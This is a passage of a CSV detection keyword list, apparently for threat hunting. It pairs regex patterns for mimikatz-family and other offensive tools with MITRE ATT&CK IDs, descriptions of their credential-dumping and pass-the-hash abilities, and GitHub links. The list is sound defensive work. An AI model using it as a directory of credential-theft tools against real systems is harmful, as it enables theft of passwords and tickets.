pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimi64.exe *",".{0,1000}mimi64\.exe\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Mimi-Command *",".{0,1000}Mimi\-Command\s.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Mimi-Command privilege::*",".{0,1000}Mimi\-Command\sprivilege\:\:.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 
- T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*mimidogz-master.zip*",".{0,1000}mimidogz\-master\.zip.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*mimidrv (mimikatz)*",".{0,1000}mimidrv\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv*",".{0,1000}mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" 
"*mimidrv.pdb*",".{0,1000}mimidrv\.pdb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.zip*",".{0,1000}mimidrv\.zip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimikatz -Command *",".{0,1000}mimikatz\s\-Command\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*mimikatz for Windows*",".{0,1000}mimikatz\sfor\sWindows.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Mimikatz*",".{0,1000}Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Mimikatz.cs*",".{0,1000}Mimikatz\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*mimikatz.log*",".{0,1000}mimikatz\.log.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*mimikatz.py*",".{0,1000}mimikatz\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mimikatz.raw*",".{0,1000}mimikatz\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*mimikatz_cred_collector.py*",".{0,1000}mimikatz_cred_collector\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*mimikatz_dotnet2js*",".{0,1000}mimikatz_dotnet2js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_dynwrapx*",".{0,1000}mimikatz_dynwrapx.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_tashlib*",".{0,1000}mimikatz_tashlib.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_trunk*",".{0,1000}mimikatz_trunk.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimikatz_x64.exe*",".{0,1000}mimikatz_x64\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*mimikatz_x86.exe*",".{0,1000}mimikatz_x86\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*MimikatzByPowerShellForDomain.py*",".{0,1000}MimikatzByPowerShellForDomain\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*MimikatzOnLocal.py*",".{0,1000}MimikatzOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*mimikittenz*",".{0,1000}mimikittenz.{0,1000}","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/orlyjamie/mimikittenz","1","1","N/A","10","10","1814","333","2020-10-16T01:20:30Z","2016-07-04T13:57:18Z" "*mimilib (mimikatz)*",".{0,1000}mimilib\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib for Windows (mimikatz)*",".{0,1000}mimilib\sfor\sWindows\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib*",".{0,1000}mimilib.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib.dll*",".{0,1000}mimilib\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib.dll*",".{0,1000}mimilib\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib.py*",".{0,1000}mimilib\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mimilove*",".{0,1000}mimilove.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" 
"*mimilove.exe*",".{0,1000}mimilove\.exe.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilove.vcxproj*",".{0,1000}mimilove\.vcxproj.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimipenguin*",".{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. This was assigned CVE-2018-20781 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781). 
Fun fact its still not fixed after GNOME Keyring 3.27.2 and still works as of 3.28.0.2-1ubuntu1.18.04.1.","T1555 - T1003 - T1212 - T1558","TA0001 - TA0003","N/A","N/A","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","N/A","N/A","10","3680","631","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z" "*mimipenguin.*",".{0,1000}mimipenguin\..{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*mimipenguin.cna*",".{0,1000}mimipenguin\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 